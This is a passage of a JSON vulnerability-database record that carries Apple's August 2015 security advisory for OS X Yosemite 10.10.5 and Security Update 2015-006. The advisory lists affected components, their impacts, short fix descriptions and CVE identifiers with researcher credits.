"CVE-2015-3796", "CVE-2009-5044", "CVE-2015-5783", "CVE-2014-9680", "CVE-2015-5763", "CVE-2014-8767", "CVE-2015-3767", "CVE-2015-3806", "CVE-2015-1791", "CVE-2015-3771", "CVE-2015-3148"], "description": "\r\n\r\nAPPLE-SA-2015-08-13-2 OS X Yosemite v10.10.5 and Security Update\r\n2015-006\r\n\r\nOS X Yosemite v10.10.5 and Security Update 2015-006 is now available\r\nand addresses the following:\r\n\r\napache\r\nAvailable for: OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: Multiple vulnerabilities existed in Apache 2.4.16, the most\r\nserious of which may allow a remote attacker to cause a denial of\r\nservice.\r\nDescription: Multiple vulnerabilities existed in Apache versions\r\nprior to 2.4.16. These were addressed by updating Apache to version\r\n2.4.16.\r\nCVE-ID\r\nCVE-2014-3581\r\nCVE-2014-3583\r\nCVE-2014-8109\r\nCVE-2015-0228\r\nCVE-2015-0253\r\nCVE-2015-3183\r\nCVE-2015-3185\r\n\r\napache_mod_php\r\nAvailable for: OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: Multiple vulnerabilities existed in PHP 5.5.20, the most\r\nserious of which may lead to arbitrary code execution.\r\nDescription: Multiple vulnerabilities existed in PHP versions prior\r\nto 5.5.20. These were addressed by updating Apache to version 5.5.27.\r\nCVE-ID\r\nCVE-2015-2783\r\nCVE-2015-2787\r\nCVE-2015-3307\r\nCVE-2015-3329\r\nCVE-2015-3330\r\nCVE-2015-4021\r\nCVE-2015-4022\r\nCVE-2015-4024\r\nCVE-2015-4025\r\nCVE-2015-4026\r\nCVE-2015-4147\r\nCVE-2015-4148\r\n\r\nApple ID OD Plug-in\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A malicious application may be able change the password of a\r\nlocal user\r\nDescription: In some circumstances, a state management issue existed\r\nin password authentication. The issue was addressed through improved\r\nstate management.\r\nCVE-ID\r\nCVE-2015-3799 : an anonymous researcher working with HP's Zero Day\r\nInitiative\r\n\r\nAppleGraphicsControl\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A malicious application may be able to determine kernel\r\nmemory layout\r\nDescription: An issue existed in AppleGraphicsControl which could\r\nhave led to the disclosure of kernel memory layout. This issue was\r\naddressed through improved bounds checking.\r\nCVE-ID\r\nCVE-2015-5768 : JieTao Yang of KeenTeam\r\n\r\nBluetooth\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A local user may be able to execute arbitrary code with\r\nsystem privileges\r\nDescription: A memory corruption issue existed in\r\nIOBluetoothHCIController. This issue was addressed through improved\r\nmemory handling.\r\nCVE-ID\r\nCVE-2015-3779 : Teddy Reed of Facebook Security\r\n\r\nBluetooth\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A malicious application may be able to determine kernel\r\nmemory layout\r\nDescription: A memory management issue could have led to the\r\ndisclosure of kernel memory layout. This issue was addressed with\r\nimproved memory management.\r\nCVE-ID\r\nCVE-2015-3780 : Roberto Paleari and Aristide Fattori of Emaze\r\nNetworks\r\n\r\nBluetooth\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A malicious app may be able to access notifications from\r\nother iCloud devices\r\nDescription: An issue existed where a malicious app could access a\r\nBluetooth-paired Mac or iOS device's Notification Center\r\nnotifications via the Apple Notification Center Service. The issue\r\naffected devices using Handoff and logged into the same iCloud\r\naccount. This issue was resolved by revoking access to the Apple\r\nNotification Center Service.\r\nCVE-ID\r\nCVE-2015-3786 : Xiaolong Bai (Tsinghua University), System Security\r\nLab (Indiana University), Tongxin Li (Peking University), XiaoFeng\r\nWang (Indiana University)\r\n\r\nBluetooth\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: An attacker with privileged network position may be able to\r\nperform denial of service attack using malformed Bluetooth packets\r\nDescription: An input validation issue existed in parsing of\r\nBluetooth ACL packets. This issue was addressed through improved\r\ninput validation.\r\nCVE-ID\r\nCVE-2015-3787 : Trend Micro\r\n\r\nBluetooth\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A local attacker may be able to cause unexpected application\r\ntermination or arbitrary code execution\r\nDescription: Multiple buffer overflow issues existed in blued's\r\nhandling of XPC messages. These issues were addressed through\r\nimproved bounds checking.\r\nCVE-ID\r\nCVE-2015-3777 : mitp0sh of [PDX]\r\n\r\nbootp\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A malicious Wi-Fi network may be able to determine networks\r\na device has previously accessed\r\nDescription: Upon connecting to a Wi-Fi network, iOS may have\r\nbroadcast MAC addresses of previously accessed networks via the DNAv4\r\nprotocol. This issue was addressed through disabling DNAv4 on\r\nunencrypted Wi-Fi networks.\r\nCVE-ID\r\nCVE-2015-3778 : Piers O'Hanlon of Oxford Internet Institute,\r\nUniversity of Oxford (on the EPSRC Being There project)\r\n\r\nCloudKit\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A malicious application may be able to access the iCloud\r\nuser record of a previously signed in user\r\nDescription: A state inconsistency existed in CloudKit when signing\r\nout users. This issue was addressed through improved state handling.\r\nCVE-ID\r\nCVE-2015-3782 : Deepkanwal Plaha of University of Toronto\r\n\r\nCoreMedia Playback\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Viewing a maliciously crafted movie file may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: Memory corruption issues existed in CoreMedia Playback.\r\nThese were addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-5777 : Apple\r\nCVE-2015-5778 : Apple\r\n\r\nCoreText\r\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: Processing a maliciously crafted font file may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: A memory corruption issue existed in the processing of\r\nfont files. This issue was addressed through improved input\r\nvalidation.\r\nCVE-ID\r\nCVE-2015-5761 : John Villamil (@day6reak), Yahoo Pentest Team\r\n\r\nCoreText\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Processing a maliciously crafted font file may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: A memory corruption issue existed in the processing of\r\nfont files. This issue was addressed through improved input\r\nvalidation.\r\nCVE-ID\r\nCVE-2015-5755 : John Villamil (@day6reak), Yahoo Pentest Team\r\n\r\ncurl\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Multiple vulnerabilities in cURL and libcurl prior to\r\n7.38.0, one of which may allow remote attackers to bypass the Same\r\nOrigin Policy.\r\nDescription: Multiple vulnerabilities existed in cURL and libcurl\r\nprior to 7.38.0. These issues were addressed by updating cURL to\r\nversion 7.43.0.\r\nCVE-ID\r\nCVE-2014-3613\r\nCVE-2014-3620\r\nCVE-2014-3707\r\nCVE-2014-8150\r\nCVE-2014-8151\r\nCVE-2015-3143\r\nCVE-2015-3144\r\nCVE-2015-3145\r\nCVE-2015-3148\r\nCVE-2015-3153\r\n\r\nData Detectors Engine\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Processing a sequence of unicode characters can lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: Memory corruption issues existed in processing of\r\nUnicode characters. These issues were addressed through improved\r\nmemory handling.\r\nCVE-ID\r\nCVE-2015-5750 : M1x7e1 of Safeye Team (www.safeye.org)\r\n\r\nDate & Time pref pane\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Applications that rely on system time may have unexpected\r\nbehavior\r\nDescription: An authorization issue existed when modifying the\r\nsystem date and time preferences. This issue was addressed with\r\nadditional authorization checks.\r\nCVE-ID\r\nCVE-2015-3757 : Mark S C Smith\r\n\r\nDictionary Application\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: An attacker with a privileged network position may be able\r\nto intercept users' Dictionary app queries\r\nDescription: An issue existed in the Dictionary app, which did not\r\nproperly secure user communications. This issue was addressed by\r\nmoving Dictionary queries to HTTPS.\r\nCVE-ID\r\nCVE-2015-3774 : Jeffrey Paul of EEQJ, Jan Bee of the Google Security\r\nTeam\r\n\r\nDiskImages\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Processing a maliciously crafted DMG file may lead to an\r\nunexpected application termination or arbitrary code execution with\r\nsystem privileges\r\nDescription: A memory corruption issue existed in parsing of\r\nmalformed DMG images. This issue was addressed through improved\r\nmemory handling.\r\nCVE-ID\r\nCVE-2015-3800 : Frank Graziano of the Yahoo Pentest Team\r\n\r\ndyld\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A local user may be able to execute arbitrary code with\r\nsystem privileges\r\nDescription: A path validation issue existed in dyld. This was\r\naddressed through improved environment sanitization.\r\nCVE-ID\r\nCVE-2015-3760 : beist of grayhash, Stefan Esser\r\n\r\nFontParser\r\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: Processing a maliciously crafted font file may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: A memory corruption issue existed in the processing of\r\nfont files. This issue was addressed through improved input\r\nvalidation.\r\nCVE-ID\r\nCVE-2015-3804 : Apple\r\nCVE-2015-5775 : Apple\r\n\r\nFontParser\r\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: Processing a maliciously crafted font file may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: A memory corruption issue existed in the processing of\r\nfont files. This issue was addressed through improved input\r\nvalidation.\r\nCVE-ID\r\nCVE-2015-5756 : John Villamil (@day6reak), Yahoo Pentest Team\r\n\r\ngroff\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Multiple issues in pdfroff\r\nDescription: Multiple issues existed in pdfroff, the most serious of\r\nwhich may allow arbitrary filesystem modification. These issues were\r\naddressed by removing pdfroff.\r\nCVE-ID\r\nCVE-2009-5044\r\nCVE-2009-5078\r\n\r\nImageIO\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Processing a maliciously crafted TIFF image may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: A memory corruption issue existed in the processing of\r\nTIFF images. This issue was addressed through improved bounds\r\nchecking.\r\nCVE-ID\r\nCVE-2015-5758 : Apple\r\n\r\nImageIO\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Visiting a maliciously crafted website may result in the\r\ndisclosure of process memory\r\nDescription: An uninitialized memory access issue existed in\r\nImageIO's handling of PNG and TIFF images. Visiting a malicious\r\nwebsite may result in sending data from process memory to the\r\nwebsite. This issue is addressed through improved memory\r\ninitialization and additional validation of PNG and TIFF images.\r\nCVE-ID\r\nCVE-2015-5781 : Michal Zalewski\r\nCVE-2015-5782 : Michal Zalewski\r\n\r\nInstall Framework Legacy\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A malicious application may be able to execute arbitrary\r\ncode with root privileges\r\nDescription: An issue existed in how Install.framework's 'runner'\r\nbinary dropped privileges. This issue was addressed through improved\r\nprivilege management.\r\nCVE-ID\r\nCVE-2015-5784 : Ian Beer of Google Project Zero\r\n\r\nInstall Framework Legacy\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A malicious application may be able to execute arbitrary\r\ncode with system privileges\r\nDescription: A race condition existed in\r\nInstall.framework's 'runner' binary that resulted in\r\nprivileges being incorrectly dropped. This issue was addressed\r\nthrough improved object locking.\r\nCVE-ID\r\nCVE-2015-5754 : Ian Beer of Google Project Zero\r\n\r\nIOFireWireFamily\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A local user may be able to execute arbitrary code with\r\nsystem privileges\r\nDescription: Memory corruption issues existed in IOFireWireFamily.\r\nThese issues were addressed through additional type input validation.\r\nCVE-ID\r\nCVE-2015-3769 : Ilja van Sprundel\r\nCVE-2015-3771 : Ilja van Sprundel\r\nCVE-2015-3772 : Ilja van Sprundel\r\n\r\nIOGraphics\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A malicious application may be able to execute arbitrary\r\ncode with system privileges\r\nDescription: A memory corruption issue existed in IOGraphics. This\r\nissue was addressed through additional type input validation.\r\nCVE-ID\r\nCVE-2015-3770 : Ilja van Sprundel\r\nCVE-2015-5783 : Ilja van Sprundel\r\n\r\nIOHIDFamily\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A local user may be able to execute arbitrary code with\r\nsystem privileges\r\nDescription: A buffer overflow issue existed in IOHIDFamily. This\r\nissue was addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-5774 : TaiG Jailbreak Team\r\n\r\nKernel\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A malicious application may be able to determine kernel\r\nmemory layout\r\nDescription: An issue existed in the mach_port_space_info interface,\r\nwhich could have led to the disclosure of kernel memory layout. This\r\nwas addressed by disabling the mach_port_space_info interface.\r\nCVE-ID\r\nCVE-2015-3766 : Cererdlong of Alibaba Mobile Security Team,\r\n@PanguTeam\r\n\r\nKernel\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A malicious application may be able to execute arbitrary\r\ncode with system privileges\r\nDescription: An integer overflow existed in the handling of IOKit\r\nfunctions. This issue was addressed through improved validation of\r\nIOKit API arguments.\r\nCVE-ID\r\nCVE-2015-3768 : Ilja van Sprundel\r\n\r\nKernel\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A local user may be able to cause a system denial of service\r\nDescription: A resource exhaustion issue existed in the fasttrap\r\ndriver. This was addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-5747 : Maxime VILLARD of m00nbsd\r\n\r\nKernel\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A local user may be able to cause a system denial of service\r\nDescription: A validation issue existed in the mounting of HFS\r\nvolumes. This was addressed by adding additional checks.\r\nCVE-ID\r\nCVE-2015-5748 : Maxime VILLARD of m00nbsd\r\n\r\nKernel\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A malicious application may be able to execute unsigned code\r\nDescription: An issue existed that allowed unsigned code to be\r\nappended to signed code in a specially crafted executable file. This\r\nissue was addressed through improved code signature validation.\r\nCVE-ID\r\nCVE-2015-3806 : TaiG Jailbreak Team\r\n\r\nKernel\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A specially crafted executable file could allow unsigned,\r\nmalicious code to execute\r\nDescription: An issue existed in the way multi-architecture\r\nexecutable files were evaluated that could have allowed unsigned code\r\nto be executed. This issue was addressed through improved validation\r\nof executable files.\r\nCVE-ID\r\nCVE-2015-3803 : TaiG Jailbreak Team\r\n\r\nKernel\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A local user may be able to execute unsigned code\r\nDescription: A validation issue existed in the handling of Mach-O\r\nfiles. This was addressed by adding additional checks.\r\nCVE-ID\r\nCVE-2015-3802 : TaiG Jailbreak Team\r\nCVE-2015-3805 : TaiG Jailbreak Team\r\n\r\nKernel\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Parsing a maliciously crafted plist may lead to an\r\nunexpected application termination or arbitrary code execution with\r\nsystem privileges\r\nDescription: A memory corruption existed in processing of malformed\r\nplists. This issue was addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-3776 : Teddy Reed of Facebook Security, Patrick Stein\r\n(@jollyjinx) of Jinx Germany\r\n\r\nKernel\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A local user may be able to execute arbitrary code with\r\nsystem privileges\r\nDescription: A path validation issue existed. This was addressed\r\nthrough improved environment sanitization.\r\nCVE-ID\r\nCVE-2015-3761 : Apple\r\n\r\nLibc\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Processing a maliciously crafted regular expression may lead\r\nto an unexpected application termination or arbitrary code execution\r\nDescription: Memory corruption issues existed in the TRE library.\r\nThese were addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-3796 : Ian Beer of Google Project Zero\r\nCVE-2015-3797 : Ian Beer of Google Project Zero\r\nCVE-2015-3798 : Ian Beer of Google Project Zero\r\n\r\nLibinfo\r\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: A remote attacker may be able to cause unexpected\r\napplication termination or arbitrary code execution\r\nDescription: Memory corruption issues existed in handling AF_INET6\r\nsockets. These were addressed by improved memory handling.\r\nCVE-ID\r\nCVE-2015-5776 : Apple\r\n\r\nlibpthread\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A malicious application may be able to execute arbitrary\r\ncode with system privileges\r\nDescription: A memory corruption issue existed in handling syscalls.\r\nThis issue was addressed through improved lock state checking.\r\nCVE-ID\r\nCVE-2015-5757 : Lufeng Li of Qihoo 360\r\n\r\nlibxml2\r\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: Multiple vulnerabilities existed in libxml2 versions prior\r\nto 2.9.2, the most serious of which may allow a remote attacker to\r\ncause a denial of service\r\nDescription: Multiple vulnerabilities existed in libxml2 versions\r\nprior to 2.9.2. These were addressed by updating libxml2 to version\r\n2.9.2.\r\nCVE-ID\r\nCVE-2012-6685 : Felix Groebert of Google\r\nCVE-2014-0191 : Felix Groebert of Google\r\n\r\nlibxml2\r\nAvailable for: OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: Parsing a maliciously crafted XML document may lead to\r\ndisclosure of user information\r\nDescription: A memory access issue existed in libxml2. This was\r\naddressed by improved memory handling\r\nCVE-ID\r\nCVE-2014-3660 : Felix Groebert of Google\r\n\r\nlibxml2\r\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: Parsing a maliciously crafted XML document may lead to\r\ndisclosure of user information\r\nDescription: A memory corruption issue existed in parsing of XML\r\nfiles. This issue was addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-3807 : Apple\r\n\r\nlibxpc\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A malicious application may be able to execute arbitrary\r\ncode with system privileges\r\nDescription: A memory corruption issue existed in handling of\r\nmalformed XPC messages. This issue was improved through improved\r\nbounds checking.\r\nCVE-ID\r\nCVE-2015-3795 : Mathew Rowley\r\n\r\nmail_cmds\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A local user may be able to execute arbitrary shell commands\r\nDescription: A validation issue existed in the mailx parsing of\r\nemail addresses. This was addressed by improved sanitization.\r\nCVE-ID\r\nCVE-2014-7844\r\n\r\nNotification Center OSX\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A malicious application may be able to access all\r\nnotifications previously displayed to users\r\nDescription: An issue existed in Notification Center, which did not\r\nproperly delete user notifications. This issue was addressed by\r\ncorrectly deleting notifications dismissed by users.\r\nCVE-ID\r\nCVE-2015-3764 : Jonathan Zdziarski\r\n\r\nntfs\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A local user may be able to execute arbitrary code with\r\nsystem privileges\r\nDescription: A memory corruption issue existed in NTFS. This issue\r\nwas addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-5763 : Roberto Paleari and Aristide Fattori of Emaze\r\nNetworks\r\n\r\nOpenSSH\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Remote attackers may be able to circumvent a time delay for\r\nfailed login attempts and conduct brute-force attacks\r\nDescription: An issue existed when processing keyboard-interactive\r\ndevices. This issue was addressed through improved authentication\r\nrequest validation.\r\nCVE-ID\r\nCVE-2015-5600\r\n\r\nOpenSSL\r\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: Multiple vulnerabilities existed in OpenSSL versions prior\r\nto 0.9.8zg, the most serious of which may allow a remote attacker to\r\ncause a denial of service.\r\nDescription: Multiple vulnerabilities existed in OpenSSL versions\r\nprior to 0.9.8zg. These were addressed by updating OpenSSL to version\r\n0.9.8zg.\r\nCVE-ID\r\nCVE-2015-1788\r\nCVE-2015-1789\r\nCVE-2015-1790\r\nCVE-2015-1791\r\nCVE-2015-1792\r\n\r\nperl\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Parsing a maliciously crafted regular expression may lead to\r\ndisclosure of unexpected application termination or arbitrary code\r\nexecution\r\nDescription: An integer underflow issue existed in the way Perl\r\nparsed regular expressions. This issue was addressed through improved\r\nmemory handling.\r\nCVE-ID\r\nCVE-2013-7422\r\n\r\nPostgreSQL\r\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: An attacker may be able to cause unexpected application\r\ntermination or gain access to data without proper authentication\r\nDescription: Multiple issues existed in PostgreSQL 9.2.4. These\r\nissues were addressed by updating PostgreSQL to 9.2.13.\r\nCVE-ID\r\nCVE-2014-0067\r\nCVE-2014-8161\r\nCVE-2015-0241\r\nCVE-2015-0242\r\nCVE-2015-0243\r\nCVE-2015-0244\r\n\r\npython\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Multiple vulnerabilities existed in Python 2.7.6, the most\r\nserious of which may lead to arbitrary code execution\r\nDescription: Multiple vulnerabilities existed in Python versions\r\nprior to 2.7.6. These were addressed by updating Python to version\r\n2.7.10.\r\nCVE-ID\r\nCVE-2013-7040\r\nCVE-2013-7338\r\nCVE-2014-1912\r\nCVE-2014-7185\r\nCVE-2014-9365\r\n\r\nQL Office\r\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: Parsing a maliciously crafted Office document may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: A memory corruption issue existed in parsing of Office\r\ndocuments. This issue was addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-5773 : Apple\r\n\r\nQL Office\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Parsing a maliciously crafted XML file may lead to\r\ndisclosure of user information\r\nDescription: An external entity reference issue existed in XML file\r\nparsing. This issue was addressed through improved parsing.\r\nCVE-ID\r\nCVE-2015-3784 : Bruno Morisson of INTEGRITY S.A.\r\n\r\nQuartz Composer Framework\r\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: Parsing a maliciously crafted QuickTime file may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: A memory corruption issue existed in parsing of\r\nQuickTime files. This issue was addressed through improved memory\r\nhandling.\r\nCVE-ID\r\nCVE-2015-5771 : Apple\r\n\r\nQuick Look\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Searching for a previously viewed website may launch the web\r\nbrowser and render that website\r\nDescription: An issue existed where QuickLook had the capability to\r\nexecute JavaScript. The issue was addressed by disallowing execution\r\nof JavaScript.\r\nCVE-ID\r\nCVE-2015-3781 : Andrew Pouliot of Facebook, Anto Loyola of Qubole\r\n\r\nQuickTime 7\r\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: Processing a maliciously crafted file may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: Multiple memory corruption issues existed in QuickTime.\r\nThese issues were addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-3772\r\nCVE-2015-3779\r\nCVE-2015-5753 : Apple\r\nCVE-2015-5779 : Apple\r\n\r\nQuickTime 7\r\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: Processing a maliciously crafted file may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: Multiple memory corruption issues existed in QuickTime.\r\nThese issues were addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-3765 : Joe Burnett of Audio Poison\r\nCVE-2015-3788 : Ryan Pentney and Richard Johnson of Cisco Talos\r\nCVE-2015-3789 : Ryan Pentney and Richard Johnson of Cisco Talos\r\nCVE-2015-3790 : Ryan Pentney and Richard Johnson of Cisco Talos\r\nCVE-2015-3791 : Ryan Pentney and Richard Johnson of Cisco Talos\r\nCVE-2015-3792 : Ryan Pentney and Richard Johnson of Cisco Talos\r\nCVE-2015-5751 : WalkerFuz\r\n\r\nSceneKit\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Viewing a maliciously crafted Collada file may lead to\r\narbitrary code execution\r\nDescription: A heap buffer overflow existed in SceneKit's handling\r\nof Collada files. This issue was addressed through improved input\r\nvalidation.\r\nCVE-ID\r\nCVE-2015-5772 : Apple\r\n\r\nSceneKit\r\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: A remote attacker may be able to cause unexpected\r\napplication termination or arbitrary code execution\r\nDescription: A memory corruption issue existed in SceneKit. This\r\nissue was addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-3783 : Haris Andrianakis of Google Security Team\r\n\r\nSecurity\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A standard user may be able to gain access to admin\r\nprivileges without proper authentication\r\nDescription: An issue existed in handling of user authentication.\r\nThis issue was addressed through improved authentication checks.\r\nCVE-ID\r\nCVE-2015-3775 : [Eldon Ahrold]\r\n\r\nSMBClient\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A remote attacker may be able to cause unexpected\r\napplication termination or arbitrary code execution\r\nDescription: A memory corruption issue existed in the SMB client.\r\nThis issue was addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-3773 : Ilja van Sprundel\r\n\r\nSpeech UI\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Parsing a maliciously crafted unicode string with speech\r\nalerts enabled may lead to an unexpected application termination or\r\narbitrary code execution\r\nDescription: A memory corruption issue existed in handling of\r\nUnicode strings. This issue was addressed by improved memory\r\nhandling.\r\nCVE-ID\r\nCVE-2015-3794 : Adam Greenbaum of Refinitive\r\n\r\nsudo\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Multiple vulnerabilities existed in sudo versions prior to\r\n1.7.10p9, the most serious of which may allow an attacker access to\r\narbitrary files\r\nDescription: Multiple vulnerabilities existed in sudo versions prior\r\nto 1.7.10p9. These were addressed by updating sudo to version\r\n1.7.10p9.\r\nCVE-ID\r\nCVE-2013-1775\r\nCVE-2013-1776\r\nCVE-2013-2776\r\nCVE-2013-2777\r\nCVE-2014-0106\r\nCVE-2014-9680\r\n\r\ntcpdump\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Multiple vulnerabilities existed in tcpdump 4.7.3, the most\r\nserious of which may allow a remote attacker to cause a denial of\r\nservice.\r\nDescription: Multiple vulnerabilities existed in tcpdump versions\r\nprior to 4.7.3. These were addressed by updating tcpdump to version\r\n4.7.3.\r\nCVE-ID\r\nCVE-2014-8767\r\nCVE-2014-8769\r\nCVE-2014-9140\r\n\r\nText Formats\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Parsing a maliciously crafted text file may lead to\r\ndisclosure of user information\r\nDescription: An XML external entity reference issue existed with\r\nTextEdit parsing. This issue was addressed through improved parsing.\r\nCVE-ID\r\nCVE-2015-3762 : Xiaoyong Wu of the Evernote Security Team\r\n\r\nudf\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Processing a maliciously crafted DMG file may lead to an\r\nunexpected application termination or arbitrary code execution with\r\nsystem privileges\r\nDescription: A memory corruption issue existed in parsing of\r\nmalformed DMG images. This issue was addressed through improved\r\nmemory handling.\r\nCVE-ID\r\nCVE-2015-3767 : beist of grayhash\r\n\r\nOS X Yosemite v10.10.5 includes the security content of Safari 8.0.8:\r\nhttps://support.apple.com/en-us/HT205033\r\n\r\nOS X Yosemite 10.10.5 and Security Update 2015-006 may be obtained\r\nfrom the Mac App Store or Apple's Software Downloads web site:\r\nhttp://www.apple.com/support/downloads/\r\n\r\nInformation will also be posted to the Apple Security Updates\r\nweb site: https://support.apple.com/kb/HT201222\r\n\r\nThis message is signed with Apple's Product Security PGP key,\r\nand details are available at:\r\nhttps://www.apple.com/support/security/pgp/\r\n\r\n\r\n\r\n", "edition": 1, "modified": "2015-08-17T00:00:00", "published": "2015-08-17T00:00:00", "id": "SECURITYVULNS:DOC:32390", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32390", "title": "APPLE-SA-2015-08-13-2 OS X Yosemite v10.10.5 and Security Update 2015-006", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:01", "bulletinFamily": "software", "cvelist": ["CVE-2015-5768", "CVE-2015-5600", "CVE-2015-2787", "CVE-2015-5779", "CVE-2013-1775", "CVE-2015-3185", "CVE-2015-3786", "CVE-2015-1792", "CVE-2015-3761", "CVE-2014-7844", "CVE-2015-3781", "CVE-2015-3776", 